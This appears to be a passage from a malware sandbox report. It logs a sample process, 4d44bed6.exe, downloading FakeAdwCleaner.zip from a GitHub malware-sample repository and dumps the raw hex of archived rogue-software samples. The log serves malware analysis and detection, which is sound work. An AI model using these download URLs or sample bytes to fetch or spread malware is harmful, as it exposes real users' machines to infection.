                                                                                                                                                2022-09-29 12:51:34 UTC11634INData Raw: 66 e4 e0 e8 35 29 de f7 45 5f ce fa 9b 11 4a bc 99 85 aa 38 16 ba 31 6a bd ef 50 4b 01 02 3f 00 33 00 01 00 63 00 c3 5c f5 3c 00 00 00 00 58 fa 11 00 5a bb 12 00 19 00 2f 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 56 69 50 43 32 30 30 39 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 eb 28 0a b0 28 cb 01 6b b5 77 4b bb 46 d4 01 6b b5 77 4b bb 46 d4 01 01 99 07 00 02 00 41 45 03 08 00 50 4b 05 06 00 00 00 00 01 00 01 00 76 00 00 00 9a fa 11 00 00 00
                                                                                                                                                Data Ascii: f5)E_J81jPK?3c\<XZ/ Endermanch@AnViPC2009.exe ((kwKFkwKFAEPKv


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                36192.168.2.549736140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:34 UTC11634OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:34 UTC11634INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:34 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:34 UTC11635INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                37192.168.2.549737185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:34 UTC11637OUTGET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:34 UTC11637INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 179477
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "38494344cdf51b86edbe1f76bf6911f46b9347e73d9f681d6b5db320a0b3f14c"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0807:AB6C:283C1A:2CD1B7:63359351
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:34 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6945-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455895.804824,VS0,VE163
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 731d7d97b7cba1729805c6971d2406e9c89973cf
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:34 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:34 UTC11638INData Raw: 50 4b 03 04 14 00 01 00 08 00 86 96 4d 46 d7 12 44 12 55 bc 02 00 48 fb 02 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 8e 63 4d 32 e6 4e f1 06 d8 1d 2c 5b 55 6f 80 61 1d 89 c5 b9 23 17 4d c1 5d 39 28 9a 83 78 47 ee 2b b5 07 8d 3b d4 30 bd 6f 54 91 12 19 11 4c a9 f2 16 dd bf 38 2c 19 f9 23 af 82 53 4b f1 f8 80 6e f2 b4 22 67 da 4e 10 9b 5b 94 a7 03 15 5b 09 c4 b3 c7 d1 e4 ed 99 13 12 6c 94 b1 03 46 99 d6 66 20 52 49 0c 59 e7 3b 2e b9 b9 0e bc 4c 3e d8 15 6f 62 84 e0 96 7f 00 cc 6b 3d 98 16 92 50 73 fa 6d b9 60 24 13 1e 11 97 fa 5d 35 5a 94 46 f2 53 dc 7f b9 2e 13 e0 5c e7 b5 66 43 0a 6b f2 de 9c b6 63 70 8f 94 7b 83 60 80 8e ea b5 75 ea cb f9 d1 3a d9 23 6a 17 21 e8 64 dc 6d c2 46 56 04 a8 ad ca f4
                                                                                                                                                Data Ascii: PKMFDUHEndermanch@FakeAdwCleaner.execM2N,[Uoa#M]9(xG+;0oTL8,#SKn"gN[[lFf RIY;.L>obk=Psm`$]5ZFS.\fCkcp{`u:#j!dmFV
                                                                                                                                                2022-09-29 12:51:34 UTC11639INData Raw: d9 c0 2d 87 2d 75 b8 41 8b 73 ae 90 fa 4e 15 0d 9e 82 b6 25 20 ea 4c 2b d6 fc 21 48 89 1a 1d 5d 4f 7f c4 94 cc 8f f2 1d 11 8c 3e 6c 50 02 22 1b 21 cf 6c cc 13 c3 08 6a 0d 41 4d 74 ed 83 22 3f 71 d4 70 48 dc 09 d7 3b 01 2b 5e c0 f0 47 26 c3 b9 42 14 a4 54 01 4c 7c f9 a9 43 5d 14 36 85 be 2b 17 47 f2 1c d5 6b d8 8a 0f cd f1 e9 88 c6 a1 69 6d 54 6d 42 d1 5c 15 9e aa 71 d8 27 76 24 a2 02 85 cc a2 13 40 62 2d 50 b7 d3 8d 81 06 68 e6 7e e2 12 f9 37 64 cb 42 3f cc 14 56 aa cc d7 e9 46 15 d8 0e 65 3a 3f bc 47 c4 bd 0c c5 f8 6e 27 66 d5 aa e3 c3 ee 40 93 50 c5 e4 e1 af a0 30 21 7b 5b fb f4 ab 50 2c 8f 6d a8 c6 24 66 86 bc bd 85 67 38 92 03 c2 fb 3d a2 1e a6 f2 4a 3c 4f f7 17 28 f2 c6 b1 90 18 95 64 3a f9 1f cf 5b cf e6 01 f2 6d ab 94 ee 7b 62 90 d0 15 43 fc b8 be
                                                                                                                                                Data Ascii: --uAsN% L+!H]O>lP"!ljAMt"?qpH;+^G&BTL|C]6+GkimTmB\q'v$@b-Ph~7dB?VFe:?Gn'f@P0!{[P,m$fg8=J<O(d:[m{bC
                                                                                                                                                2022-09-29 12:51:34 UTC11640INData Raw: 94 36 4b 45 7b 96 2c 36 f4 82 2c ad 50 9d 78 e6 1e 6d 32 7a ed da 10 0f 7a db 65 f9 35 0c df ca 06 b9 e7 82 e8 2d 74 fa 17 9c 2e b2 9d fc bb 71 37 ca 81 64 cc 20 6f 9c b6 c9 9f 9f 6f 28 5e 0a 69 66 00 b3 68 63 7e 5f ae b0 f8 71 e1 ca 42 1c 7c cc 51 8f 3f c1 21 bd c0 8f b2 a3 f5 16 b1 0a b3 62 99 6b 3c 5b c0 7e ec ab c6 ba 59 e5 a1 db c2 41 a3 23 99 0c 44 4c 97 c1 13 c1 8f 9f e3 c1 65 57 54 2d 17 6d e2 59 7c 9a e5 a4 0c 0b 1c ea 8d 64 6d a9 e7 4f 70 e3 64 07 1c 6e c8 64 c1 75 03 8e d4 a7 85 ce a7 dc b3 42 6e 34 ac d5 dc b0 35 28 ac 78 bf 02 30 dc fb c4 e6 1a ea 8b e0 dc f3 2a a6 c0 b7 33 7e c9 25 44 9b bd df cb 39 f9 6d f7 6b 7d e2 af ed 52 36 26 fb ad b8 29 e0 b7 3a 66 93 02 3b 06 34 d2 c8 75 0b 39 4c 9b 41 87 4d e0 81 3e 74 aa ad eb 22 cd 1f 50 52 3c 25
                                                                                                                                                Data Ascii: 6KE{,6,Pxm2zze5-t.q7d oo(^ifhc~_qB|Q?!bk<[~YA#DLeWT-mY|dmOpdnduBn45(x0*3~%D9mk}R6&):f;4u9LAM>t"PR<%
                                                                                                                                                2022-09-29 12:51:34 UTC11642INData Raw: e3 90 37 b3 60 f1 e5 e2 72 e4 7a ec 3b a5 04 21 f2 c0 a8 80 e3 0b 27 44 db fe 94 f4 95 9a 77 0c 9a b4 47 71 6f aa fa 55 4e fb 54 48 63 42 ad 7e de 33 8d e9 b7 af 19 19 9f e5 33 16 c0 14 d8 aa ef 10 d9 b8 63 b9 4c b0 c0 27 be fd 1c 56 35 5c 3b 53 3c 60 e7 19 a0 43 3a 45 a5 83 d6 23 90 17 bf 9f c5 43 5b fd 1e a9 d2 07 38 8c 4b b2 09 b5 0a 29 7f f4 83 cf 82 eb 8b ff fd b9 d6 87 ed c7 f9 cd c5 4d f1 0e 28 3e aa 73 ef 77 9c 22 0b 36 81 f5 f5 57 12 d6 63 32 75 ae af 35 cb f7 9d 3b fb 26 ef 0f fe f1 a3 53 c5 c4 6d dc 2f a2 9a 5d f6 1a 6c d4 b9 c5 08 14 21 9b 55 58 49 32 03 f8 cd e2 21 37 2e a4 3f a4 b5 04 ee 68 34 08 83 ca 9f 9d 57 40 3b e5 61 5c 2c 3f 3f 90 22 75 c9 eb db 89 f4 fb ab 7c 7e ad 9a c6 46 4c 91 aa 9c 82 cd 7e 8f 99 5b 42 ef 2f ec ed 8e 8f 93 dd 2a
                                                                                                                                                Data Ascii: 7`rz;!'DwGqoUNTHcB~33cL'V5\;S<`C:E#C[8K)M(>sw"6Wc2u5;&Sm/]l!UXI2!7.?h4W@;a\,??"u|~FL~[B/*
                                                                                                                                                2022-09-29 12:51:34 UTC11643INData Raw: 39 6d 81 20 c2 2b 16 52 80 a8 dd 26 77 b2 58 3c 42 1d dc e5 a4 02 9f 4f 8b c7 cf 66 7e 2a 86 36 2f 12 c6 e3 88 7b 88 cc 75 6e 12 f0 a3 fd 68 de 49 cf 91 50 5f c5 ba be b8 19 21 95 e4 8d 03 61 2a 8e 98 ef 13 b8 55 67 59 db 87 07 88 ce 79 50 82 2e 40 7f 49 7a 34 30 db 6d ad be 77 60 53 1c 53 66 52 81 3e 1f e4 3e 96 e0 b7 6e f2 9a 1f db fa 76 be 89 92 0a d5 5b a9 b3 fc 04 36 9a 6c 8a 8d eb 72 3b 42 3b af 23 90 48 c9 3d e7 a0 c1 75 81 cc 26 4d 5c 0a db c7 bf f2 f5 6b 34 a7 b9 04 e1 0e 06 c5 90 f7 0f dd 87 6c bc 04 56 33 c9 a5 c2 9f 54 68 d9 f5 51 86 3d 06 2c 9c bb a1 b2 bd 5d b0 6a a0 88 c1 ad 3d 23 4e 2e d0 8b b4 92 3d dd 63 45 a2 d6 c5 a3 e0 cf 8f 15 30 73 92 05 3a f2 a0 67 a4 f7 b7 b5 d6 1d 76 89 ab 4b 50 34 2c f0 65 da 1f e1 31 a9 be 51 2c 6c e7 93 45 16
                                                                                                                                                Data Ascii: 9m +R&wX<BOf~*6/{unhIP_!a*UgYyP.@Iz40mw`SSfR>>nv[6lr;B;#H=u&M\k4lV3ThQ=,]j=#N.=cE0s:gvKP4,e1Q,lE
                                                                                                                                                2022-09-29 12:51:34 UTC11645INData Raw: 5c 27 3a 90 13 8a a8 18 fa 8e c3 16 3a c2 cc 3b b9 c5 ba 3f 94 5e 39 60 77 d2 16 81 b0 ad 06 96 0d 19 0b bd 2d 2e c6 d7 ec 99 41 a3 b0 ce 99 d0 23 56 a5 c8 63 13 4e 68 32 bc 83 5d 50 37 5f 2b cf 27 60 90 e1 69 4c ce fe 76 ca 9a 5c bc 94 71 f9 c7 ee fc 15 32 64 94 67 42 30 c9 8d 88 bf d8 0c 6f e3 5f 33 d1 7e 50 53 2c 83 34 de cf 87 f4 ca 5d c8 45 e4 d9 ba 5e f8 24 70 9c 1b 8e e4 0e e6 4f e9 9f db 9e 61 a7 1c 9b 48 09 fa 6f 36 c6 de 68 d9 01 61 fa de 0a d8 d9 f5 42 18 69 c9 6e f5 45 5f fd 72 34 d5 c8 f5 c8 58 98 c5 1f d5 82 92 85 09 f8 ce e6 d4 c4 82 56 b9 4f 3d 01 d8 aa 60 06 08 6d db a6 61 44 8f 61 60 6b 56 2b 98 9e 24 47 91 8d 47 3c bd 88 35 22 e0 9b 2c 43 72 ec eb 01 c5 af 6f 10 84 a1 fd 0f e1 5e 65 43 66 59 11 da 70 75 42 ea 22 a3 a4 5f fd 65 52 02 23
                                                                                                                                                Data Ascii: \'::;?^9`w-.A#VcNh2]P7_+'`iLv\q2dgB0o_3~PS,4]E^$pOaHo6haBinE_r4XVO=`maDa`kV+$GG<5",Cro^eCfYpuB"_eR#
                                                                                                                                                2022-09-29 12:51:34 UTC11646INData Raw: 4f ee 57 80 3a 53 0c 54 62 9c de 2b 08 77 ac 72 d6 a5 48 60 9a 5f e0 a9 a0 34 89 7c ab e2 ea fc c7 36 09 a4 30 67 72 7e af 23 12 82 8a 9a e1 c3 a9 0d 3c 8c b5 4b 8c 52 b6 7f 20 4e df 85 13 6b a2 4e 47 d5 99 09 b1 66 22 17 a1 98 87 d7 6d ee 0d c2 18 55 50 b9 e0 56 c3 12 f0 6a a2 9f 34 e5 43 aa 30 bf f1 d1 0c 79 0e 70 14 13 35 33 8b 4c 57 1a c5 e9 7d 22 d3 f1 7e 07 c1 f6 7f ba 25 a5 42 53 36 97 59 a6 e9 e9 08 22 ef a6 61 2b 6a b5 60 29 af 32 1d ae 9e 67 ac 2e 74 15 f0 a4 cc 61 5f 04 7b cf cb 8d bd ce cb 99 01 b8 52 e6 7a 55 6c dc dc 5e b7 79 a2 14 01 c7 fc 87 b0 fe 3f e8 a2 6a fe be 38 ff 1d e0 98 66 58 a1 ca 3b 2f 78 4b 54 88 4e 8b d1 72 de 00 d4 40 fa 40 a6 a4 5e 9e 07 df bd f0 f3 93 ae 1e df 7e c7 b4 f7 23 aa 0b 09 5f ad 8f 87 9a 7c 3b 6a 3d b2 20 56 c4
                                                                                                                                                Data Ascii: OW:STb+wrH`_4|60gr~#<KR NkNGf"mUPVj4C0yp53LW}"~%BS6Y"a+j`)2g.ta_{RzUl^y?j8fX;/xKTNr@@^~#_|;j= V
                                                                                                                                                2022-09-29 12:51:34 UTC11647INData Raw: d4 0e 9e 60 8f 34 40 bf 51 56 4b 40 ce f7 ad ae b1 d4 d6 67 9f aa a0 29 41 a2 7a c4 32 80 d1 b2 ea 69 87 b2 34 e5 90 a6 b6 7f df 53 70 1e 1b 0f 55 cd af b6 26 b1 45 77 07 9a 81 11 a5 a3 7f 50 57 2a 5c e5 ab 71 a4 6e ac d6 77 8f c1 b7 b0 5e c6 1e da 60 e3 00 ab 0a fa 8e 81 86 e9 35 a0 0d aa 21 a6 64 de 06 ae 0a e5 53 a1 b5 28 d0 0c 0b fc 68 57 45 1a f6 a3 78 b8 4f 5f 27 c2 ad 41 32 5b 04 ba 30 41 da 5a 77 30 b1 a0 00 0c c9 57 3b d7 1a 3a 24 a4 2f 5c 16 17 7e bf e4 14 84 b8 0d f9 25 70 32 ae d9 66 87 71 0f f0 f9 43 5c b3 f3 aa df b6 7a 00 76 5d eb 15 c9 d0 bc 65 14 02 53 f0 1b 56 e7 5e 3c 64 25 c9 c6 dd 35 c8 93 7c b9 f5 49 28 12 ed 80 2e b6 df cb c6 78 a6 8f bf 69 20 af eb 3b 8b d6 b6 19 83 a0 91 64 ac 77 d6 1a 7c fb 1e 3c b6 65 75 2f e3 6d 35 66 c3 0e fb
                                                                                                                                                Data Ascii: `4@QVK@g)Az2i4SpU&EwPW*\qnw^`5!dS(hWExO_'A2[0AZw0W;:$/\~%p2fqC\zv]eSV^<d%5|I(.xi ;dw|<eu/m5f
                                                                                                                                                2022-09-29 12:51:34 UTC11649INData Raw: a9 49 a9 bb 74 02 f1 67 5b b4 4e b8 60 21 ad 9b 8e 8a 25 5b 04 92 d3 27 83 04 89 16 10 7f 05 1e 87 7f 94 76 08 90 09 18 f7 2d 25 0b 5a 7c 84 3e 1e 3d c3 01 90 c6 78 b3 94 42 a8 77 3b 50 2d 20 91 a3 e7 5f 8a c0 c4 e2 a3 52 b3 66 4f d2 fe 83 2d 48 f2 24 7b 83 4a d6 34 87 ed 15 08 b3 e3 a9 b7 7e 0f 4f ae a6 76 58 2b d4 48 86 c0 ee 3a 22 1a c7 28 bf b3 fd 9e cc 7d a3 3c 7f 0c 50 a9 55 e5 1e bb 08 6b c9 4f 57 04 b6 ad a5 df b8 f9 6f 7b 9d 22 c1 47 b6 23 1b 12 c0 bb c0 84 9a a0 56 4f 76 53 ae 37 6c f8 27 aa b9 c5 c2 70 7d e2 1a 40 98 de a6 fd 33 fd f5 b1 74 21 dd 02 b6 16 c0 b8 19 32 0f fc 73 fb b4 be ee 1e 37 99 42 ef a2 90 99 ce 6c de 70 50 37 cd e6 e7 dd bc fd b6 0d d2 9f 69 0c 38 5a fb b5 4c 06 b8 fb a2 ba 40 49 2b f5 64 7d 6f 9b f5 7d 98 e2 95 fd ee 29 db
                                                                                                                                                Data Ascii: Itg[N`!%['v-%Z|>=xBw;P- _RfO-H${J4~OvX+H:"(}<PUkOWo{"G#VOvS7l'p}@3t!2s7BlpP7i8ZL@I+d}o})
                                                                                                                                                2022-09-29 12:51:34 UTC11650INData Raw: 5d 47 e1 31 b6 1d 16 83 76 db ad 7e 65 4d b4 ec 37 d1 a4 cd 7b d1 8e 97 3f fd b8 1e 43 32 6e 74 6f 7e da 03 4b 4b b1 1c 4f 8c 72 87 fd ba 69 10 e9 ee 61 1e 9b f5 1d df c0 9e 18 9e 13 a4 8c 3c 78 90 4a 87 71 07 ac 91 bf 69 32 8e 97 43 82 18 20 d9 29 71 ae 97 81 80 8b e1 10 1a 16 d1 4c f3 9c 12 d3 5e 63 51 43 c4 ef dd 05 7d 54 ae b8 f7 04 f6 a2 46 43 07 d8 fa ed 75 9c 6b bf e2 99 6f 1b 4a 90 90 9f 24 95 9b fb 79 e5 e2 b2 32 67 27 35 fd 14 06 2c 27 3b 87 68 2c ed 63 c2 c8 05 75 ae cc 67 bb da cb 3c 1c e1 d7 74 7b de c3 b1 85 c6 88 56 d3 30 45 db 9b 79 ce 7d 6b c5 a8 e4 f0 6a f0 f8 9f e6 4e e7 35 5e a7 44 a4 4b 24 7a 55 79 17 f4 90 ad 05 a5 70 b7 64 d1 ee 4c 4f 56 47 c7 68 38 9d 02 61 89 ec 8a a7 7e 4a 63 ba 93 40 ab 5c 71 1a c9 9a 79 de f4 8a 4a 32 39 ab 5f
                                                                                                                                                Data Ascii: ]G1v~eM7{?C2nto~KKOria<xJqi2C )qL^cQC}TFCukoJ$y2g'5,';h,cug<t{V0Ey}kjN5^DK$zUypdLOVGh8a~Jc@\qyJ29_
                                                                                                                                                2022-09-29 12:51:34 UTC11651INData Raw: 4d 4e 8e ff 39 9d 8d fe 11 12 64 ae 0c 1a f8 cb 86 ee 36 7a 1a dc a8 6f ea 81 0d d6 43 61 b3 af 0a 58 a5 7e 3b 1e 92 c2 e2 54 51 38 c9 f3 7e 0e 6c 2a 6d 32 4e 0c 42 dd 85 9d 7e f4 0e d8 3c fa 84 2e 7d cf cc c1 6f 14 66 3c 3d d5 27 29 d0 ae a0 4e 52 39 3b 09 a1 43 07 c4 de 67 b7 ac b6 fd 53 ce 96 26 9d 8b 10 90 1f a4 46 45 50 4b 7a 69 32 4d b1 57 ec 26 c0 4f 63 1c b9 a1 44 aa 6f 8f f2 01 dc 63 84 52 4c 8c ee e2 07 2f bf 88 1d c7 87 75 80 7b a8 1e 82 9b 1f 13 20 10 4f e9 8a 10 d8 81 58 f7 46 39 d3 69 3e b7 ce d6 83 2d 65 9b 84 91 69 30 27 a7 e3 c7 80 ba 38 d7 51 cb a5 dd f6 b3 c9 23 81 60 46 c2 71 f2 27 6f 2f f7 93 30 cf 91 78 34 f6 da fe 0a 3e d0 c4 4d 74 c2 2d cf 65 2c db b9 ab 7c 92 ea c7 b7 37 85 92 25 62 52 45 49 9b f9 4c 87 57 c9 6d 80 45 d7 5e 30 c3
                                                                                                                                                Data Ascii: MN9d6zoCaX~;TQ8~l*m2NB~<.}of<=')NR9;CgS&FEPKzi2MW&OcDocRL/u{ OXF9i>-ei0'8Q#`Fq'o/0x4>Mt-e,|7%bREILWmE^0
                                                                                                                                                2022-09-29 12:51:34 UTC11653INData Raw: b0 4d 49 eb e1 1a a2 38 6d 32 ca 4c dd bc 44 6d 9d 98 f1 5d 22 cd 00 8c c3 ba ea 34 67 9a 00 30 cc 2f cf 04 a5 6f aa b6 e7 89 d8 40 34 92 32 83 66 c5 f8 e4 e5 d8 6d 23 dd fd bc 08 4e e7 1d d5 08 04 44 b0 9b 93 41 af 35 26 01 7b a3 a9 d3 9b 94 14 e8 06 ec 58 81 dd d5 33 ba 1b 04 ba 59 50 f0 bb 81 d6 68 9d f9 ad f8 ed 13 f1 3b 0b 17 ca cb 9f 55 13 2d 20 c1 d4 9b 32 27 bc 9d 2c 20 96 7f 14 a3 8e 00 90 fe ba 18 ce d5 4a 34 0d b7 de 3a 71 c3 19 48 8f 1e 74 87 ba 38 48 8b 6e b4 49 4d 78 9e 5f 79 d5 80 b4 1a 9f 19 ef 7d c6 d1 3c e5 16 64 cb 9a e9 2e ec 3a f6 ba 72 09 3e 09 1b 33 6c c9 ff 5a 82 ae 61 7a 85 a7 0c 71 d1 59 8c a9 41 b9 8b 32 16 15 0a 51 fe f5 8f 72 da 04 41 cc 35 04 f1 51 64 32 05 ff e5 2a 6c f0 5e 0b 91 ac 74 c9 de 2e 34 0d 6c 54 7b 03 fb 8d 6b de
                                                                                                                                                Data Ascii: MI8m2LDm]"4g0/o@42fm#NDA5&{X3YPh;U- 2', J4:qHt8HnIMx_y}<d.:r>3lZazqYA2QrA5Qd2*l^t.4lT{k
                                                                                                                                                2022-09-29 12:51:34 UTC11653INData Raw: b0 1d b3 34 a5 dc 77 39 6a 96 10 ed eb d4 28 09 a3 e1 b5 b1 5c 73 ff e3 4e 0f a9 0b 02 80 35 5f 25 0d 7a 64 08 55 70 aa 1b ca d4 90 05 41 60 a9 dc 23 04 03 7d b1 bd 10 63 c9 6b 81 3f 99 20 0a b3 ef f9 08 43 b5 04 dc c5 96 f4 26 ba 8b 68 72 bc dc 8e ae a7 58 e2 fd 03 ca ab 6e 3d 2a c0 86 97 3e f2 aa ab c2 e1 2e 59 07 8c 7f f6 22 0d 54 1c 26 56 7d bc 7a 87 7e 21 31 91 84 06 44 18 e1 ac d4 35 7a 29 d3 92 24 77 a9 ee 29 3a 37 54 8f 8a 6a 6a c3 4b e7 7d 7d bc 47 86 5a 5f bb 98 ab dc bb 87 1f 54 82 36 b5 d3 7e 12 64 f6 32 aa 5a 20 75 5b ec 5b 43 8b 7c 35 63 a6 1f 52 fa 1a b1 fe 9b dc ce e8 c1 cb a8 57 9f a3 c7 5c e6 15 de 84 9e 19 b9 39 e3 17 7f 7a 1f 7f a3 96 77 e3 eb ab 98 c3 6d f6 72 a9 2b 3b 4c e3 6f 0b 01 62 12 5d 75 9e a5 95 79 5c 9c f4 42 6a d5 95 1f 81
                                                                                                                                                Data Ascii: 4w9j(\sN5_%zdUpA`#}ck? C&hrXn=*>.Y"T&V}z~!1D5z)$w):7TjjK}}GZ_T6~d2Z u[[C|5cRW\9zwmr+;Lob]uy\Bj
                                                                                                                                                2022-09-29 12:51:34 UTC11669INData Raw: 20 d0 e0 95 0e e5 68 05 0c 23 8c 34 ba 6f c9 95 c2 bb a7 40 90 5d b5 9f 12 df ff af 40 19 8d 39 5f 00 ea a3 61 32 40 27 80 f4 1d 8d b3 f7 2e da 6a 31 be 50 1b f8 c1 70 28 57 af 64 a3 8e 7c 27 a3 ee 81 18 93 ac 00 6c 10 e7 03 fa 8d cf 22 3b a1 7e 4a 63 fb 96 30 05 96 75 93 82 96 3a 47 a4 7f 03 30 58 22 56 3d 50 cf d5 51 b9 28 53 ec c7 f7 06 ef 94 cf 63 7f 3d 83 a3 a8 b8 87 11 be 3c 1d 18 cb a4 2a c0 9b 71 2a dd 89 a8 eb f2 d7 d0 c7 04 c7 cf 67 55 ee ee cc 80 77 72 6e 03 d0 90 b5 cb c0 28 54 67 d6 c8 8a a4 e9 9d 98 e6 46 be 6c f8 1e 9b e7 7e 2b 04 b6 13 67 8e 1d 0e 7f fa 3c 01 c4 6e 32 91 a5 2c 64 3b f9 f7 ed 7b 51 65 e2 39 84 e6 8a 0a be 2e f5 e3 df ba f5 a5 70 13 f4 fc 8e 38 3e fa c2 9f 51 32 3c bb 69 e4 6a 61 13 80 b1 83 0f 41 bb dc 09 13 c5 eb 36 51 45
                                                                                                                                                Data Ascii: h#4o@]@9_a2@'.j1Pp(Wd|'l";~Jc0u:G0X"V=PQ(Sc=<*q*gUwrn(TgFl~+g<n2,d;{Qe9.p8>Q2<ijaA6QE
                                                                                                                                                2022-09-29 12:51:34 UTC11685INData Raw: 10 8c 51 32 fb 54 97 0c 7a 0c c1 07 a9 70 92 2a ee e7 ec 0b 8f 7b 74 0a df 5b e2 4f b5 3e 7f 64 51 77 7e 43 d9 8c 85 8c 65 0d 6c 6b 7c 2c 86 49 58 1a 51 78 5d d2 6b 34 58 2e b6 b8 a0 1c 95 07 50 6a 9e d4 1c 41 43 30 07 5e be 4c 35 d0 1f 52 a7 a6 ff a7 45 02 95 cf bd e3 a3 ef 08 0f 13 c4 8f 90 4e 08 7a ab e9 41 3a 38 87 0c ea 65 89 74 8d 7d 4f 6f 83 3a a5 b0 e3 90 85 dc ff 1c 45 4f f3 cf 9f 13 a4 9e 19 bc 96 9d fb ff 70 d8 9e f7 88 0b 70 10 99 92 af a6 d1 bf 06 82 ee 46 37 1c d7 b3 c2 19 1c e6 fe ef c5 49 73 06 98 7c 20 66 2b f5 3f e3 ba 36 25 5c 38 11 bd b2 8a ea 66 40 71 ac ea 31 ac 9c 13 9d 0f c0 10 c1 f8 4a 1e 5c 2e 32 a6 21 b0 a6 c4 96 21 6c 3f 0d 1d 87 24 33 d3 83 b0 8a f0 a8 c7 79 1c 5f b7 d1 2f e6 05 83 74 f2 c6 8d 41 9b 41 80 ae 7b 00 88 ff 4e 51
                                                                                                                                                Data Ascii: Q2Tzp*{t[O>dQw~Celk|,IXQx]k4X.PjAC0^L5RENzA:8et}Oo:EOppF7Is| f+?6%\8f@q1J\.2!!l?$3y_/tAA{NQ
